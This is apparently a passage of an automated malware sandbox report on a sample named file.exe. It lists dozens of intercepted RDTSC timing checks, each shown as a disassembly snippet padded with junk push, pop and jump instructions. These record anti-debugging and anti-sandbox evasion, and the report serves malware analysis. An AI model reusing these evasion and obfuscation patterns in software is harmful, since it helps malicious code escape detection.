    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFE523 second address: DFE53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F2573ED21h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFE53E second address: DFE544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFE544 second address: DFE55D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F9F2573ED16h 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007F9F2573ED16h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFEA78 second address: DFEA7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFEA7C second address: DFEA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F9F2573ED1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF03D second address: DFF05A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F24D1BA89h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF05A second address: DFF06C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9F2573ED1Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF06C second address: DFF072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF072 second address: DFF078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF078 second address: DFF081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF081 second address: DFF085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF085 second address: DFF08B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF08B second address: DFF099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F9F2573ED1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF390 second address: DFF3B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9F24D1BA76h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ebx 0x0000000e jmp 00007F9F24D1BA89h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E025BB second address: E025C0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0289A second address: E028AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F24D1BA81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02A16 second address: E02A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02A1A second address: E02A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9F24D1BA76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F9F24D1BA7Ah 0x00000012 push eax 0x00000013 pop eax 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jmp 00007F9F24D1BA7Dh 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02F85 second address: E02FB9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9F2573ED26h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9F2573ED28h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E03114 second address: E0311C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5294A second address: D52950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52950 second address: D5299A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9F24D1BA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F9F24D1BA89h 0x0000000f popad 0x00000010 push edx 0x00000011 push ebx 0x00000012 jmp 00007F9F24D1BA7Fh 0x00000017 jmp 00007F9F24D1BA7Eh 0x0000001c pop ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09309 second address: E09311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09311 second address: E09326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F24D1BA80h 0x00000009 pop edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0F4D0 second address: E0F4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0F4D4 second address: E0F4D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0F93A second address: E0F942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0FD72 second address: E0FD80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F9F24D1BA7Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E10B09 second address: E10B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E10B0F second address: E10B17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0EB5F second address: E0EB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F9F2573ED1Bh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E23497 second address: E2349D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2349D second address: E234AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E234AA second address: E234B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E23019 second address: E2301F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2301F second address: E23067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9F24D1BA85h 0x0000000b jmp 00007F9F24D1BA87h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9F24D1BA83h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25FEF second address: E25FF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2FB31 second address: E2FB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F24D1BA85h 0x00000009 jng 00007F9F24D1BA76h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2FB50 second address: E2FB61 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F9F2573ED29h 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37BD9 second address: E37BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3AAEF second address: E3AAF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3AAF5 second address: E3AB0A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007F9F24D1BA76h 0x0000000d jne 00007F9F24D1BA76h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3F99F second address: E3F9B9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9F2573ED16h 0x00000008 js 00007F9F2573ED16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jl 00007F9F2573ED16h 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3F9B9 second address: E3F9BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3F9BF second address: E3F9C9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9F2573ED1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FC2E second address: E3FC32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FC32 second address: E3FC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9F2573ED22h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FC4C second address: E3FC50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FD91 second address: E3FD9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9F2573ED27h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FD9D second address: E3FDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F24D1BA7Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FDB2 second address: E3FDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FF3E second address: E3FF6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F24D1BA7Ah 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jl 00007F9F24D1BA76h 0x00000010 jmp 00007F9F24D1BA7Dh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FF6A second address: E3FF70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FF70 second address: E3FF74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E40217 second address: E4021D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4021D second address: E40221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E40221 second address: E40231 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F2573ED1Bh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E43793 second address: E43799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E43799 second address: E4379F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44D26 second address: E44D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44D32 second address: E44D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44D3D second address: E44D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9F24D1BA76h 0x0000000a jns 00007F9F24D1BA76h 0x00000010 jmp 00007F9F24D1BA7Bh 0x00000015 popad 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E46CC7 second address: E46CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E46CCB second address: E46CF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F24D1BA7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007F9F24D1BA81h 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E46CF4 second address: E46D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F2573ED1Dh 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E46D06 second address: E46D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F9F24D1BA76h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E46D12 second address: E46D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E46A40 second address: E46A4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F9F24D1BA76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5664D second address: E56655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56655 second address: E56663 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9F24D1BA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56663 second address: E56667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56667 second address: E5666B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5666B second address: E56690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F2573ED29h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56690 second address: E566A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9F24D1BA7Ah 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E544A4 second address: E544AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E655A4 second address: E655AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E653F9 second address: E6540C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F2573ED1Fh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6540C second address: E65410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E65410 second address: E65416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6997C second address: E69999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F9F24D1BA76h 0x00000009 jno 00007F9F24D1BA76h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F9F24D1BA76h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E69999 second address: E6999D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E694EA second address: E694F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F9F24D1BA76h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E69656 second address: E6965C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6965C second address: E69665 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E69665 second address: E69674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007F9F2573ED38h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E69674 second address: E69682 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F9F24D1BA76h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E69682 second address: E6968C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9F2573ED16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E815BC second address: E815D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F24D1BA86h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E815D6 second address: E815DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E815DA second address: E815E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E815E0 second address: E815EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F9F2573ED16h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E815EE second address: E815F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E815F2 second address: E815F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E816F4 second address: E816FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E816FA second address: E81700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81700 second address: E8171D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a jo 00007F9F24D1BA88h 0x00000010 push edi 0x00000011 jmp 00007F9F24D1BA7Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81A19 second address: E81A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81CD4 second address: E81CDE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9F24D1BA76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81FA5 second address: E81FD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F2573ED26h 0x00000007 jmp 00007F9F2573ED28h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81FD7 second address: E81FF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F24D1BA85h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81FF0 second address: E81FF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E820F9 second address: E820FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E820FD second address: E8210D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F9F2573ED1Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8227F second address: E82283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
